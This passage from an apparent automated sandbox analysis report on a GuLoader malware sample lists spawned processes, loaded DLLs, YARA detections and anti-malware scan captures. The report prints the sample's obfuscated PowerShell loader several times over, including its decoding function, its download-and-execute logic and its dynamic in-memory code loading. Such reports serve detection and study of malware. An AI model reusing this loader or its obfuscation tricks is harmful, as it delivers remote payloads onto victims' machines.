DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddan", "0")
          Yara detected GuLoader
          Source: Yara matchFile source: 0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Forestries)$global:Zantewood = [System.Text.Encoding]::ASCII.GetString($Seniorstipendiats)$global:Gelatinizing192=$Zantewood.substring(295986,30428)<#Psychophobia Abdicable Clypeastr
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Curacaoerne $Ciphered $Pladsholderes), (Survigrous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Eradiating = [AppDomain]::CurrentDomain.GetAssemblies()$
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Clasp)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Transformatorstationerne, $false).DefineType($Sybar
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Forestries)$global:Zantewood = [System.Text.Encoding]::ASCII.GetString($Seniorstipendiats)$global:Gelatinizing192=$Zantewood.substring(295986,30428)<#Psychophobia Abdicable Clypeastr
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
